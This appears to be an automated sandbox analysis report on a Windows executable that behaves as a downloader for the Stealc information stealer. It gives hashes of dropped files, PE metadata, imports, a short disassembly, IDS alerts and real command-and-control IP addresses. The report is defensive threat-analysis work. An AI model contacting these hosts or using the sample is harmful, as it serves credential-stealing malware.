                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.3.6.2.2.3.4.8.1.2.8.2.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.3.6.2.2.3.5.3.5.9.7.0.7.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.9.0.c.b.f.8.-.a.f.1.c.-.4.a.f.1.-.a.9.6.3.-.4.3.f.c.a.9.9.a.6.9.d.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.1.5.e.9.0.c.-.0.0.a.c.-.4.6.6.6.-.9.e.e.3.-.3.2.f.c.f.6.2.0.d.3.c.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.1.C.9...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.2.0.-.0.0.0.1.-.0.0.1.4.-.7.3.6.4.-.0.8.a.9.1.d.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.9.0.0.5.b.8.4.9.4.2.4.3.3.9.4.2.5.f.0.1.1.f.7.3.7.3.5.1.5.3.c.0.0.0.0.f.f.f.f.!.0.0.0.0.b.e.3.9.9.8.1.c.9.8.1.2.3.3.5.b.0.2.8.4.6.a.1.0.9.8.e.1.8.a.0.c.e.f.f.f.3.7.0.d.!.8.1.C.9...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER842A.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Fri Oct 25 20:37:15 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):60476
                                                      Entropy (8bit):1.9095634653547193
                                                      Encrypted:false
                                                      SSDEEP:384:qZePOSruEE7oaK75jboqw/CMI6qXvyEBfj:qGO5EEU5jboqXMI6myuj
                                                      MD5:39CB4F8E687AEDF51B9778C3FE827080
                                                      SHA1:2F457E14FBA16C0AD0A84C917C00E0A29E35BAE4
                                                      SHA-256:D39C284D1629663F6B1516BFD0706FBF5B0016F76CDA48DDC59B4B8DF9433C1B
                                                      SHA-512:8ED8652C956FB277AA0AAB0D0353195A43FDD23CB456AE184AF9E234BA7D0976238539B215A602FF3C8EE3FE90AC0AFE44E9D8521EABB1DEF848440AB0209A02
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:MDMP..a..... .......{..g............4...............<............*..........T.......8...........T............3..<.......................................................................................................eJ......H.......GenuineIntel............T....... ...t..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8516.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8308
                                                      Entropy (8bit):3.6971397478287087
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJd26ver6Y4a6CVgmfHXpDT89bCPsf0/Wm:R6lXJs6vK6YN6QgmfH2C0fq
                                                      MD5:4C5103AC7B88C58276B30BA4A2797E2F
                                                      SHA1:09EA0433F39120758EAD9645981AD25028B9D14E
                                                      SHA-256:88A162641C55A028377D2EF33651B21DB5B7C1C5D65C0F03F6C889F87E506EA9
                                                      SHA-512:1A648218D6E76C286BE8FCF0A1D7775A75609C1E1477037F9A91A32148860A9DEDFACF91FF34A52DEF0FAEBC2592D5D1F96B157C13DDCB6972B2D8C24F25E6E0
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.5.6.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8536.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4565
                                                      Entropy (8bit):4.441325515663391
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsXJg77aI9HMWpW8VYvYm8M4JdtF4W4+q8oiEp8oifd:uIjf5I7xl7V/JswEp/ifd
                                                      MD5:E1E198B64AEBA6DA8333449D142C5B04
                                                      SHA1:1231E7960042540B5AD55D7C8B7D7EA0363AF952
                                                      SHA-256:3C91C588ADBAF31FDB57F2244C13CBA1E25AAFD3E05301B845E6D520D8D9509D
                                                      SHA-512:A288C44F3FEC9FB664F9B41DAEA9C55D0A1B5E04F192285977C415D5633DBD0622125C326CB775804A8ECCC8A01E13532530FFF563CAC1862870E8A3F5E7312E
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559419" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\VAIIBIHmtT.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):351744
                                                      Entropy (8bit):6.763877856831789
                                                      Encrypted:false
                                                      SSDEEP:6144:9as81rSM11vPDW3R8LUlZ3yXeNPV65UJmz:JIF11nD2R/33IS65UE
                                                      MD5:E00B441455DC50083BB537C343EB1B99
                                                      SHA1:BE39981C9812335B02846A1098E18A0CEFFF370D
                                                      SHA-256:63797AD6A754066E10BDA16D14D5D54714A2A1D14CAA392D3B157187075616CA
                                                      SHA-512:D169C4FD07105282306F03D0ED600EE9BE762911138CA914E6585AAE6865F80ABCC4E2A588F9A3C9E2D26DA6B8CE83E10271CC81A269DAC82EA505E1BA90AE36
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                      Reputation:low
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}\]...]...]......\...C..A...C..L...C......zRh.Z...]...!...C..\...C..\...C..\...Rich]...........PE..L....I.e.................p........................@...........................&.................................................P........}...........................................................................................................text....o.......p.................. ..`.rdata...".......$...t..............@..@.data...|........H..................@....rsrc....].......~..................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\81C9.tmp.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\VAIIBIHmtT.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):351744
                                                      Entropy (8bit):6.763877856831789
                                                      Encrypted:false
                                                      SSDEEP:6144:9as81rSM11vPDW3R8LUlZ3yXeNPV65UJmz:JIF11nD2R/33IS65UE
                                                      MD5:E00B441455DC50083BB537C343EB1B99
                                                      SHA1:BE39981C9812335B02846A1098E18A0CEFFF370D
                                                      SHA-256:63797AD6A754066E10BDA16D14D5D54714A2A1D14CAA392D3B157187075616CA
                                                      SHA-512:D169C4FD07105282306F03D0ED600EE9BE762911138CA914E6585AAE6865F80ABCC4E2A588F9A3C9E2D26DA6B8CE83E10271CC81A269DAC82EA505E1BA90AE36
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                      Reputation:low
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}\]...]...]......\...C..A...C..L...C......zRh.Z...]...!...C..\...C..\...C..\...Rich]...........PE..L....I.e.................p........................@...........................&.................................................P........}...........................................................................................................text....o.......p.................. ..`.rdata...".......$...t..............@..@.data...|........H..................@....rsrc....].......~..................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1835008
                                                      Entropy (8bit):4.465465532668864
                                                      Encrypted:false
                                                      SSDEEP:6144:/IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNBdwBCswSb6:wXD94+WlLZMM6YFHH+6
                                                      MD5:54F93B919F2E5CE84A410EA0FD802BAF
                                                      SHA1:1D7EF6B1396250191970DD0BBCDC7476EB2A0C4E
                                                      SHA-256:FCBC0136DFE25608B1F8236EFDBD0709518BBE0A45F20B154EEF3C8A0AEB2794
                                                      SHA-512:4890107CDC304DA3D0672FAB434BC237C3C4D5FA991255E156609AE3C8655E8541719DF09D4F1520176200C4D05B65E87980190BF0A0F84D9A55F5DA1DC6357F
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....'...............................................................................................................................................................................................................................................................................................................................................B.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):6.803050419675933
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:VAIIBIHmtT.exe
                                                      File size:463'872 bytes
                                                      MD5:35489d9dc0929e90b0b89b4f569df8c1
                                                      SHA1:57010eda768b5bf82e306443f1df42f521bbad91
                                                      SHA256:53fe5c2231b5b1753668ef852cb61e233cc389fdf8a2ac6afe2028bdd9509df6
                                                      SHA512:7253f7c0ab1b1dfeae4058c3d8b9d27c7b1198d4c03a2077d1dfa3b4fdc6a1bdb12c15484a8b01427eb9d3efcd407951508bdf50e35282c3bcba498d8557460b
                                                      SSDEEP:6144:YLI/zz3WcgfnaQkjXI7fAzEPaGyeohq5WUKXHvcB6vGH/k7YR0T3:Yk/zz39sUYMEPDyLhtfXPPMW
                                                      TLSH:DAA4F190B9C4F831C5A24E748C39D7EA297EB8328624494B372C7F5F3D752D29AB1316
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7.(.s.F.s.F.s.F.m...h.F.m...k.F.m.....F.T.=.z.F.s.G...F.m...r.F.m...r.F.m...r.F.Richs.F.................PE..L..._.?e...........

                                                      File Icon

                                                      Icon Hash:86c7c30b0f4e0d19

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x403943
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x653FFC5F [Mon Oct 30 18:56:31 2023 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:0
                                                      File Version Major:5
                                                      File Version Minor:0
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:0
                                                      Import Hash:9ed66fda5fccdbfc3c7dba376824972f

                                                      Entrypoint Preview

                                                      Instruction
                                                      call 00007FD4F07E8EDEh
                                                      jmp 00007FD4F07E575Eh
                                                      int3
                                                      int3
                                                      int3
                                                      call 00007FD4F07E591Ch
                                                      xchg cl, ch
                                                      jmp 00007FD4F07E5904h
                                                      call 00007FD4F07E5913h
                                                      fxch st(0), st(1)
                                                      jmp 00007FD4F07E58FBh
                                                      fabs
                                                      fld1
                                                      mov ch, cl
                                                      xor cl, cl
                                                      jmp 00007FD4F07E58F1h
                                                      mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                      fabs
                                                      fxch st(0), st(1)
                                                      fabs
                                                      fxch st(0), st(1)
                                                      fpatan
                                                      or cl, cl
                                                      je 00007FD4F07E58E6h
                                                      fldpi
                                                      fsubrp st(1), st(0)
                                                      or ch, ch
                                                      je 00007FD4F07E58E4h
                                                      fchs
                                                      ret
                                                      fabs
                                                      fld st(0), st(0)
                                                      fld st(0), st(0)
                                                      fld1
                                                      fsubrp st(1), st(0)
                                                      fxch st(0), st(1)
                                                      fld1
                                                      faddp st(1), st(0)
                                                      fmulp st(1), st(0)
                                                      ftst
                                                      wait
                                                      fstsw word ptr [ebp-000000A0h]
                                                      wait
                                                      test byte ptr [ebp-0000009Fh], 00000001h
                                                      jne 00007FD4F07E58E7h
                                                      xor ch, ch
                                                      fsqrt
                                                      ret
                                                      pop eax
                                                      jmp 00007FD4F07E90AFh
                                                      fstp st(0)
                                                      fld tbyte ptr [0045755Ah]
                                                      ret
                                                      fstp st(0)
                                                      or cl, cl
                                                      je 00007FD4F07E58EDh
                                                      fstp st(0)
                                                      fldpi
                                                      or ch, ch
                                                      je 00007FD4F07E58E4h
                                                      fchs
                                                      ret
                                                      fstp st(0)
                                                      fldz
                                                      or ch, ch
                                                      je 00007FD4F07E58D9h
                                                      fchs
                                                      ret
                                                      fstp st(0)
                                                      jmp 00007FD4F07E9085h
                                                      fstp st(0)
                                                      mov cl, ch
                                                      jmp 00007FD4F07E58E2h
                                                      call 00007FD4F07E58AEh
                                                      jmp 00007FD4F07E9090h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push ebp
                                                      mov ebp, esp
                                                      add esp, FFFFFD30h
                                                      push ebx

                                                      Rich Headers

                                                      Programming Language:
                                                      • [C++] VS2008 build 21022
                                                      • [ASM] VS2008 build 21022
                                                      • [ C ] VS2008 build 21022
                                                      • [IMP] VS2005 build 50727
                                                      • [RES] VS2008 build 21022
                                                      • [LNK] VS2008 build 21022

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5651c0x64.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x680000x13f28.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c0000x910.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26380x40.text
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x190.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x55e620x560000104407b6e1f0f61edf7aa959c97a772False0.7920972247456395data7.267782607208231IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .data0x570000x105980x5c00afdd07fa947c0d9730405c2e6a6d3debFalse0.07931385869565218Matlab v4 mat-file (little endian) n2, sparse, rows 0, columns 00.9306250999888682IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x680000x13f280x1400058118a4681a559ec7e3cab621d34fa93False0.47679443359375data5.570433876023632IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x7c0000x13500x140043c4d62d41a0a83d6468742d5517ef08False0.396484375data3.8593706022686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      BECUSABOKIBEVOHESIYOW0x721a00x136fASCII text, with very long lines (4975), with no line terminatorsTamilIndia0.5947738693467337
                                                      BECUSABOKIBEVOHESIYOW0x721a00x136fASCII text, with very long lines (4975), with no line terminatorsTamilSri Lanka0.5947738693467337
                                                      XUBONAVEGUCIZAKUFAMABAWADUJATA0x735100x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilIndia0.5879156423858196
                                                      XUBONAVEGUCIZAKUFAMABAWADUJATA0x735100x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilSri Lanka0.5879156423858196
                                                      RT_CURSOR0x753a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                      RT_CURSOR0x762480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                      RT_CURSOR0x76af00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                      RT_CURSOR0x770880x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                      RT_CURSOR0x771b80xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                      RT_CURSOR0x772900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                      RT_CURSOR0x781380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                      RT_CURSOR0x789e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                      RT_CURSOR0x78f780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                                      RT_CURSOR0x79e200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                                      RT_CURSOR0x7a6c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                      RT_ICON0x688600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.7857142857142857
                                                      RT_ICON0x688600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.7857142857142857
                                                      RT_ICON0x68f280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.8043568464730291
                                                      RT_ICON0x68f280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.8043568464730291
                                                      RT_ICON0x6b4d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.8634751773049646
                                                      RT_ICON0x6b4d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.8634751773049646
                                                      RT_ICON0x6b9680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.36886993603411516
                                                      RT_ICON0x6b9680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.36886993603411516
                                                      RT_ICON0x6c8100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5130866425992779
                                                      RT_ICON0x6c8100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5130866425992779
                                                      RT_ICON0x6d0b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.5841013824884793
                                                      RT_ICON0x6d0b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.5841013824884793
                                                      RT_ICON0x6d7800x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6502890173410405
                                                      RT_ICON0x6d7800x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6502890173410405
                                                      RT_ICON0x6dce80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.462448132780083
                                                      RT_ICON0x6dce80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.462448132780083
                                                      RT_ICON0x702900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.475375234521576
                                                      RT_ICON0x702900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.475375234521576
                                                      RT_ICON0x713380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.45778688524590166
                                                      RT_ICON0x713380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.45778688524590166
                                                      RT_ICON0x71cc00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5106382978723404
                                                      RT_ICON0x71cc00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5106382978723404
                                                      RT_DIALOG0x7aeb00x58data0.8977272727272727
                                                      RT_STRING0x7af080x374dataTamilIndia0.46945701357466063
                                                      RT_STRING0x7af080x374dataTamilSri Lanka0.46945701357466063
                                                      RT_STRING0x7b2800x2aedataTamilIndia0.478134110787172
                                                      RT_STRING0x7b2800x2aedataTamilSri Lanka0.478134110787172
                                                      RT_STRING0x7b5300x4e8dataTamilIndia0.4434713375796178
                                                      RT_STRING0x7b5300x4e8dataTamilSri Lanka0.4434713375796178
                                                      RT_STRING0x7ba180x510dataTamilIndia0.42746913580246915
                                                      RT_STRING0x7ba180x510dataTamilSri Lanka0.42746913580246915
                                                      RT_ACCELERATOR0x753480x58dataTamilIndia0.7954545454545454
                                                      RT_ACCELERATOR0x753480x58dataTamilSri Lanka0.7954545454545454
                                                      RT_GROUP_CURSOR0x770580x30data0.9375
                                                      RT_GROUP_CURSOR0x772680x22data1.0588235294117647
                                                      RT_GROUP_CURSOR0x78f480x30data0.9375
                                                      RT_GROUP_CURSOR0x7ac300x30data0.9375
                                                      RT_GROUP_ICON0x6b9380x30dataTamilIndia0.9375
                                                      RT_GROUP_ICON0x6b9380x30dataTamilSri Lanka0.9375
                                                      RT_GROUP_ICON0x721280x76dataTamilIndia0.6694915254237288
                                                      RT_GROUP_ICON0x721280x76dataTamilSri Lanka0.6694915254237288
                                                      RT_VERSION0x7ac600x250data0.543918918918919

                                                      Imports

                                                      DLLImport
                                                      KERNEL32.dllGlobalMemoryStatus, TlsGetValue, GlobalCompact, CreateProcessW, InterlockedIncrement, InterlockedDecrement, GetCurrentProcess, GetLogicalDriveStringsW, CreateJobObjectW, SetComputerNameW, SetVolumeMountPointW, GetComputerNameW, FreeEnvironmentStringsA, GetTickCount, GetCommConfig, ClearCommBreak, GetConsoleAliasExesW, EnumTimeFormatsW, SetFileShortNameW, LoadLibraryW, ReadConsoleInputA, IsBadCodePtr, EnumResourceNamesW, GetFileAttributesA, GetTimeFormatW, GetModuleFileNameW, GetShortPathNameA, VerifyVersionInfoW, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, CreateNamedPipeA, SetFileAttributesA, GetDiskFreeSpaceW, LoadLibraryA, GetNumberFormatW, OpenJobObjectW, SetEnvironmentVariableA, GetCurrentDirectoryA, OpenEventW, LCMapStringW, GetVersionExW, GetTempFileNameW, HeapAlloc, HeapReAlloc, GetStartupInfoW, RaiseException, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetUnhandledExceptionFilter, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleHandleA, InitializeCriticalSectionAndSpinCount, TerminateProcess, UnhandledExceptionFilter, IsDebuggerPresent, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetStringTypeW
                                                      GDI32.dllGetCharWidth32A
                                                      ole32.dllCoSuspendClassObjects
                                                      WINHTTP.dllWinHttpOpen

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      TamilIndia
                                                      TamilSri Lanka

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-10-25T22:37:05.562686+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730104.21.56.70443TCP
                                                      2024-10-25T22:37:06.688285+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731176.113.115.3780TCP
                                                      2024-10-25T22:37:15.321806+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.44973262.204.41.17780TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 25, 2024 22:37:04.185242891 CEST49730443192.168.2.4104.21.56.70
                                                      Oct 25, 2024 22:37:04.185329914 CEST44349730104.21.56.70192.168.2.4
                                                      Oct 25, 2024 22:37:04.185421944 CEST49730443192.168.2.4104.21.56.70
                                                      Oct 25, 2024 22:37:04.201246023 CEST49730443192.168.2.4104.21.56.70
                                                      Oct 25, 2024 22:37:04.201286077 CEST44349730104.21.56.70192.168.2.4
                                                      Oct 25, 2024 22:37:04.982352972 CEST44349730104.21.56.70192.168.2.4
                                                      Oct 25, 2024 22:37:04.982434988 CEST49730443192.168.2.4104.21.56.70
                                                      Oct 25, 2024 22:37:05.142751932 CEST49730443192.168.2.4104.21.56.70
                                                      Oct 25, 2024 22:37:05.142833948 CEST44349730104.21.56.70192.168.2.4
                                                      Oct 25, 2024 22:37:05.143798113 CEST44349730104.21.56.70192.168.2.4
                                                      Oct 25, 2024 22:37:05.144009113 CEST49730443192.168.2.4104.21.56.70
                                                      Oct 25, 2024 22:37:05.150130033 CEST49730443192.168.2.4104.21.56.70
                                                      Oct 25, 2024 22:37:05.195337057 CEST44349730104.21.56.70192.168.2.4
                                                      Oct 25, 2024 22:37:05.562560081 CEST44349730104.21.56.70192.168.2.4
                                                      Oct 25, 2024 22:37:05.562650919 CEST49730443192.168.2.4104.21.56.70
